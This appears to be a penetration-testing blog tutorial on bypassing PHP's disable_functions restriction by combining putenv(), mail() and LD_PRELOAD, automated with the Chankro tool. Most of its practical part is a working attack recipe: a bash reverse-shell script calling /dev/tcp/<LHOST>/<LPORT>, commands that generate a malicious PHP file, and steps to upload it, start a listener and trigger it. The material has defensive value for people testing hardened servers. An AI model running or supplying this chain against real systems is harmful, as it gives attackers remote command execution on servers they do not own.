None

File Upload Bybass , Bypass Disable Functions

1. Introduction

In hardened PHP environments, one of the most common defensive measures is disabling dangerous functions that allow command execution or process creation at the operating system level

Functions such as:

  • system()
  • exec()
  • shell_exec()
  • passthru()

are frequently disabled using the disable_functions` directive in the `php.ini` configuration file.

This restriction is intended to prevent attackers from executing arbitrary system commands even if they gain code execution inside a PHP context.

However, this protection is incomplete.

2. Attack Surface Analysis

While administrators usually focus on well-known dangerous functions, other PHP functions are often overlooked and left enabled.

Examples include:

> `dl()` allows dynamic loading of PHP extensions > `putenv()`_ allows modification of environment variables > `mail()` _ spawns a system-level mail transfer agent (e.g., `sendmail`)

During a penetration test, a common and critical step is enumerating which PHP functions remain enabled, as a single forgotten function can completely undermine the security model

3. Technique Overview

One effective yet still underutilized technique is abusing the combination of:

> `putenv()` > `mail()` > the Linux environment variable `LD_PRELOAD`

This technique is not new . It was reported to PHP back in 2008 (by _gat3way_) and still works today in poorly hardened environments.

4. Why `LD_PRELOAD` Works

LD_PRELOAD : is a Linux environment variable that forces the dynamic linker to load a specified shared object (.so) before any other libraries .

In practice, this means:

  • If a program uses a function from (ibc.so)
  • and we provide our own implementation of that function in a malicious (.so)
  • our function will be executed instead of the legitimate one

This allows function hijacking (hooking) at the operating system level.

Crucially:

  • disable_functions affects PHP only
  • LD_PRELOAD operates at the OS loader level

Once PHP spawns a system process, PHP restrictions are no longer relevant.

5. Triggering Code Execution via `mail()`

The `mail()` function internally executes a system binary such as `sendmail`

If:

  • putenv() is enabled
  • mail() is enabled

We can:

1. Set LD_PRELOAD to point to a malicious shared library 2. Trigger execution via mail() 3. Achieve arbitrary command execution without using any disabled PHP function

6. Tooling: Chankro

To automate this technique, we can use Chankro, a tool developed by Tarlogic Security specifically to bypass `disable_functions` using `LD_PRELOAD`.

Purpose of the Tool

Chankro:

  • Generates a malicious `.so` library
  • Creates a PHP wrapper that sets `LD_PRELOAD`
  • Triggers execution via `mail()`
  • Executes an attacker-controlled payload

7. Installation

git clone https://github.com/TarlogicSecurity/Chankro.git 
cd Chankro 
python2 chankro.py - help

⚠️ Note: Chankro requires Python 2

8. Usage

Create bash Script Make Rev Shell Connection `c.sh`

#!/bin/bash 
/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1

Generate the Exploit

python2 chankro.py \ 
 - arch 64 \ 
 - input c.sh \ 
 - output The_File_You_Will_Upload.php \ 
 - path /var/www/html

Then it's Gonna Create PHP File , You Just Need To Create Listener and Upload the PHP File Then Visit the Path of File